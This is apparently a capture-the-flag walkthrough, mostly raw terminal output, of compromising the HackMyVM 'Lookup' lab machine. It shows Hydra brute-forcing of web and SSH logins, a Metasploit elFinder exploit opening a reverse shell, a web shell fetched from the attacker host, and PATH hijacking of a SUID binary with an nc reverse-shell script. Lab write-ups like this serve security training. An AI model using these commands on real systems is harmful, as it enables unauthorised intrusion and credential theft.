HackMyVM Lookup

┌──(root㉿kali)-[~]
└─# arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:26:ba:73, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:14       (Unknown: locally administered)
192.168.56.100  08:00:27:d6:b8:eb       PCS Systemtechnik GmbH
192.168.56.101  08:00:27:79:3a:8a       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.102 seconds (121.79 hosts/sec). 3 responded
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.56.101                                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 04:52 EST
Nmap scan report for www.smol.hmv (192.168.56.101)
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://lookup.hmv
MAC Address: 08:00:27:79:3A:8A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.48 ms www.smol.hmv (192.168.56.101)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.65 seconds
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# nikto -h 192.168.56.101                
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2024-12-18 04:53:15 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://lookup.hmv
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2024-12-18 04:53:33 (GMT-5) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# echo 192.168.56.101 lookup.hmv > /etc/hosts 

whatweb扫一波

┌──(root㉿kali)-[~/yiyi/tmp]
└─# whatweb -v lookup.hmv                                    
WhatWeb report for http://lookup.hmv
Status    : 200 OK
Title     : Login Page
IP        : 192.168.56.101
Country   : RESERVED, ZZ

Summary   : Apache[2.4.41], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], PasswordField[password]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.41 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : Apache/2.4.41 (Ubuntu) (from server string)

[ PasswordField ]
        find password fields 

        String       : password (from field name)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 18 Dec 2024 18:04:40 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 359
        Connection: close
        Content-Type: text/html; charset=UTF-8

尝试sql注入无果

┌──(root㉿kali)-[~/yiyi/tmp]
└─# sqlmap -r req.txt  --dbs --batch
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:02:51 /2024-12-18/

[05:02:51] [INFO] parsing HTTP request from 'req.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] Y
[05:02:51] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to 'http://lookup.hmv'. Do you want to apply it from now on? [Y/n] Y
[05:02:51] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[05:02:51] [INFO] testing if the target URL content is stable
[05:02:51] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[05:02:51] [INFO] searching for dynamic content
[05:02:51] [CRITICAL] target URL content appears to be heavily dynamic. sqlmap is going to retry the request(s)
[05:02:51] [WARNING] target URL content appears to be too dynamic. Switching to '--text-only' 
[05:02:51] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[05:02:51] [INFO] (custom) POST parameter '#1*' appears to be dynamic
[05:02:51] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[05:02:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:02:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:02:52] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[05:02:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[05:02:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[05:02:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[05:02:52] [INFO] testing 'Generic inline queries'
[05:02:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[05:02:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[05:02:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[05:02:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:02:52] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[05:02:52] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[05:02:52] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[05:02:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[05:02:52] [WARNING] (custom) POST parameter '#1*' does not seem to be injectable
[05:02:52] [INFO] testing if (custom) POST parameter '#2*' is dynamic
[05:02:52] [INFO] (custom) POST parameter '#2*' appears to be dynamic
[05:02:52] [INFO] testing for SQL injection on (custom) POST parameter '#2*'
[05:02:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:02:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[05:02:53] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[05:02:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[05:02:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[05:02:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[05:02:53] [INFO] testing 'Generic inline queries'
[05:02:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[05:02:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[05:02:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[05:02:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:02:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[05:02:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[05:02:53] [INFO] testing 'Oracle AND time-based blind'
[05:02:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[05:02:53] [WARNING] (custom) POST parameter '#2*' does not seem to be injectable
[05:02:53] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 05:02:53 /2024-12-18/

fuzz一波

┌──(root㉿kali)-[~/yiyi/tmp]
└─# ffuf -c -u http://$IP -H "Host: FUZZ.lookup.hmv" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.lookup.hmv
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

:: Progress: [19966/19966] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 19966 ::

海德拉爆破账密

┌──(root㉿kali)-[~/yiyi/tmp]
└─# hydra -l admin -P /root/yiyi/rockyou.txt -f lookup.hmv http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong password" 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-18 05:11:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://lookup.hmv:80/login.php:username=^USER^&password=^PASS^:Wrong password
[80][http-post-form] host: lookup.hmv   login: admin   password: password123
[STATUS] attack finished for lookup.hmv (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-18 05:12:01

不显示password错误了，说明账号有问题

重新爆

┌──(root㉿kali)-[~/yiyi/tmp]
└─# hydra -L /root/yiyi/rockyou.txt -p password123 -f lookup.hmv http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong username" 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-18 05:15:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task
[DATA] attacking http-post-form://lookup.hmv:80/login.php:username=^USER^&password=^PASS^:Wrong username
[STATUS] 4577.00 tries/min, 4577 tries in 00:01h, 14339822 to do in 52:14h, 16 active
[80][http-post-form] host: lookup.hmv   login: jose   password: password123
[STATUS] attack finished for lookup.hmv (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-18 05:18:28

登陆后跳转files.lookup.hmv

写入hosts

┌──(root㉿kali)-[~]
└─# echo 192.168.56.101 lookup.hmv files.lookup.hmv > /etc/hosts

进入了这么个东西

拿dirsearch扫 扫出了个/elFinder/Changelog

看到了版本

直接找洞打

┌──(root㉿kali)-[~/tmp]
└─# msfconsole
Metasploit tip: Metasploit can be configured at startup, see msfconsole 
--help to learn more
                                                  

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|


       =[ metasploit v6.4.34-dev                          ]
+ -- --=[ 2461 exploits - 1267 auxiliary - 431 post       ]
+ -- --=[ 1471 payloads - 49 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[*] Starting persistent handler(s)...
msf6 > search elfinder 

Matching Modules
================

   #  Name                                                               Disclosure Date  Rank       Check  Description
   -  ----                                                               ---------------  ----       -----  -----------
   0  exploit/multi/http/builderengine_upload_exec                       2016-09-18       excellent  Yes    BuilderEngine Arbitrary File Upload Vulnerability and execution
   1  exploit/unix/webapp/tikiwiki_upload_exec                           2016-07-11       excellent  Yes    Tiki Wiki Unauthenticated File Upload Vulnerability
   2  exploit/multi/http/wp_file_manager_rce                             2020-09-09       normal     Yes    WordPress File Manager Unauthenticated Remote Code Execution
   3  exploit/linux/http/elfinder_archive_cmd_injection                  2021-06-13       excellent  Yes    elFinder Archive Command Injection
   4  exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection  2019-02-26       excellent  Yes    elFinder PHP Connector exiftran Command Injection


Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection

msf6 > use 4
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > show options

Module options (exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /elFinder/       yes       The base path to elFinder
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.160.100  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts files.lookup.hmv
rhosts => files.lookup.hmv
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.160.100:4444 
[*] Uploading payload 'TWV0K4.jpg;echo 6370202e2e2f66696c65732f545756304b342e6a70672a6563686f2a202e625637636e76474134342e706870 |xxd -r -p |sh& #.jpg' (1962 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder/php/.bV7cnvGA44.php) ...
[*] Removing uploaded file ...
[+] Deleted uploaded file
[!] This exploit may require manual cleanup of '.bV7cnvGA44.php' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > show options

Module options (exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection):

   Name       Current Setting   Required  Description
   ----       ---------------   --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     files.lookup.hmv  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80                yes       The target port (TCP)
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /elFinder/        yes       The base path to elFinder
   VHOST                        no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.160.100  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > cat /etc/hosts
[*] exec: cat /etc/hosts

192.168.56.101 lookup.hmv files.lookup.hmv
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set lhost 192.168.56.102
lhost => 192.168.56.102
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.56.102:4444 
[*] Uploading payload 'EZcGr0.jpg;echo 6370202e2e2f66696c65732f455a634772302e6a70672a6563686f2a202e56375273615774702e706870 |xxd -r -p |sh& #.jpg' (1943 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder/php/.V7RsaWtp.php) ...
[*] Sending stage (40004 bytes) to 192.168.56.101
[+] Deleted .V7RsaWtp.php
[*] Meterpreter session 1 opened (192.168.56.102:4444 -> 192.168.56.101:34062) at 2024-12-18 05:37:25 -0500
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file

meterpreter > shell -t
[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 2694 created.
Channel 0 created.
www-data@lookup:/var/www/files.lookup.hmv/public_html/elFinder/php$ 

传个马进来维持权限

www-data@lookup:/var/www/files.lookup.hmv/public_html$ ls
ls
elFinder  index.php
www-data@lookup:/var/www/files.lookup.hmv/public_html$  wget http://192.168.56.102/shell.php
02/shell.php/192.168.56.10
--2024-12-18 18:41:56--  http://192.168.56.102/shell.php
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2489 (2.4K) [application/octet-stream]
Saving to: 'shell.php'

shell.php           100%[===================>]   2.43K  --.-KB/s    in 0s      

2024-12-18 18:41:56 (313 MB/s) - 'shell.php' saved [2489/2489]

这边监听，那边访问http://files.lookup.hmv/elFinder/Changelog

查看suid

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@lookup:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
/snap/core20/1950/usr/bin/gpasswd
/snap/core20/1950/usr/bin/mount
/snap/core20/1950/usr/bin/newgrp
/snap/core20/1950/usr/bin/passwd
/snap/core20/1950/usr/bin/su
/snap/core20/1950/usr/bin/sudo
/snap/core20/1950/usr/bin/umount
/snap/core20/1950/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1950/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pwm
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount

有个pwn，可以看看

www-data@lookup:/$ strings /usr/sbin/pwm
strings /usr/sbin/pwm
/lib64/ld-linux-x86-64.so.2
libc.so.6
fopen
perror
puts
__stack_chk_fail
putchar
popen
fgetc
__isoc99_fscanf
fclose
pclose
__cxa_finalize
__libc_start_main
snprintf
GLIBC_2.4
GLIBC_2.7
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
[!] Running 'id' command to extract the username and user ID (UID)
[-] Error executing id command
uid=%*u(%[^)])
[-] Error reading username from id command
[!] ID: %s
/home/%s/.passwords
[-] File /home/%s/.passwords not found
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8061
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
pwm.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__isoc99_fscanf@@GLIBC_2.7
puts@@GLIBC_2.2.5
_edata
fclose@@GLIBC_2.2.5
__stack_chk_fail@@GLIBC_2.4
pclose@@GLIBC_2.2.5
snprintf@@GLIBC_2.2.5
fgetc@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
popen@@GLIBC_2.2.5
fopen@@GLIBC_2.2.5
perror@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
www-data@lookup:/$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found
www-data@lookup:/$ 

看样子是对用户目录下的.passwords做某种操作，于是去home下看看

www-data@lookup:/home$ cd think
cd think/
www-data@lookup:/home/think$ ls -al
ls -al
total 40
drwxr-xr-x 5 think think 4096 Jan 11  2024 .
drwxr-xr-x 3 root  root  4096 Jun  2  2023 ..
lrwxrwxrwx 1 root  root     9 Jun 21  2023 .bash_history -> /dev/null
-rwxr-xr-x 1 think think  220 Jun  2  2023 .bash_logout
-rwxr-xr-x 1 think think 3771 Jun  2  2023 .bashrc
drwxr-xr-x 2 think think 4096 Jun 21  2023 .cache
drwx------ 3 think think 4096 Aug  9  2023 .gnupg
-rw-r----- 1 root  think  525 Jul 30  2023 .passwords
-rwxr-xr-x 1 think think  807 Jun  2  2023 .profile
drw-r----- 2 think think 4096 Jun 21  2023 .ssh
lrwxrwxrwx 1 root  root     9 Jun 21  2023 .viminfo -> /dev/null
-rw-r----- 1 root  think   33 Jul 30  2023 user.txt

没有阅读权限

劫持环境变量提权

www-data@lookup:/home/think$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/fl/bin/sh -i 2>&1|nc 192.168.56.102 4444 >/tmp/f" >/tmp/id  
<sh -i 2>&1|nc 192.168.56.102 1234 >/tmp/f" >/tmp/id
www-data@lookup:/home/think$ chmod +x /tmp/id
chmod +x /tmp/id
www-data@lookup:/home/think$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@lookup:/home/think$ which id
which id
/tmp/id

监听后运行pwn发现可以回弹一个终端，说明id生效了

那么可以考虑给id一个think

这时候就完全可以劫持我们的think的id

www-data@lookup:/$ /usr/bin/id            
/usr/bin/id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@lookup:/$ /usr/bin/id think
/usr/bin/id think
uid=1000(think) gid=1000(think) groups=1000(think)

这时候我们只需要写入/usr/bin/id think的结果并echo出来就可以伪造think的id

www-data@lookup:/$ echo 'echo "uid=1000(think) gid=1000(think) groups=1000(think)"' >/tmp/id             
<hink) gid=1000(think) groups=1000(think)"' >/tmp/id
www-data@lookup:/$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
jose1001teles
jose100190
jose10001
jose10.asd
jose10+
jose0_07
jose0990
jose0986$
jose098130443
jose0981
jose0924
jose0923
jose0921
thepassword
jose(1993)
jose'sbabygurl
jose&vane
jose&takie
jose&samantha
jose&pam
jose&jlo
jose&jessica
jose&jessi
josemario.AKA(think)
jose.medina.
jose.mar
jose.luis.24.oct
jose.line
jose.leonardo100
jose.leas.30
jose.ivan
jose.i22
jose.hm
jose.hater
jose.fa
jose.f
jose.dont
jose.d
jose.com}
jose.com
jose.chepe_06
jose.a91
jose.a
jose.96.
jose.9298
jose.2856171
www-data@lookup:/$ 

爆破ssh

┌──(root㉿kali)-[~/yiyi/tmp]
└─# hydra -l think -P pass.txt ssh://192.168.56.101 -V -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-18 06:14:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:1/p:49), ~4 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose1006" - 1 of 49 [child 0] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose1004" - 2 of 49 [child 1] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose1002" - 3 of 49 [child 2] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose1001teles" - 4 of 49 [child 3] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose100190" - 5 of 49 [child 4] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose10001" - 6 of 49 [child 5] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose10.asd" - 7 of 49 [child 6] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose10+" - 8 of 49 [child 7] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0_07" - 9 of 49 [child 8] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0990" - 10 of 49 [child 9] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0986$" - 11 of 49 [child 10] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose098130443" - 12 of 49 [child 11] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0981" - 13 of 49 [child 12] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0924" - 14 of 49 [child 13] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0923" - 15 of 49 [child 14] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose0921" - 16 of 49 [child 15] (0/0)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "thepassword" - 17 of 52 [child 6] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose(1993)" - 18 of 52 [child 1] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose'sbabygurl" - 19 of 52 [child 3] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&vane" - 20 of 52 [child 4] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&takie" - 21 of 52 [child 5] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&samantha" - 22 of 52 [child 9] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&pam" - 23 of 52 [child 2] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&jlo" - 24 of 52 [child 8] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&jessica" - 25 of 52 [child 15] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose&jessi" - 26 of 52 [child 0] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "josemario.AKA(think)" - 27 of 52 [child 7] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose.medina." - 28 of 52 [child 10] (0/3)
[ATTEMPT] target 192.168.56.101 - login "think" - pass "jose.mar" - 29 of 52 [child 11] (0/3)
[22][ssh] host: 192.168.56.101   login: think   password: josemario.AKA(think)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
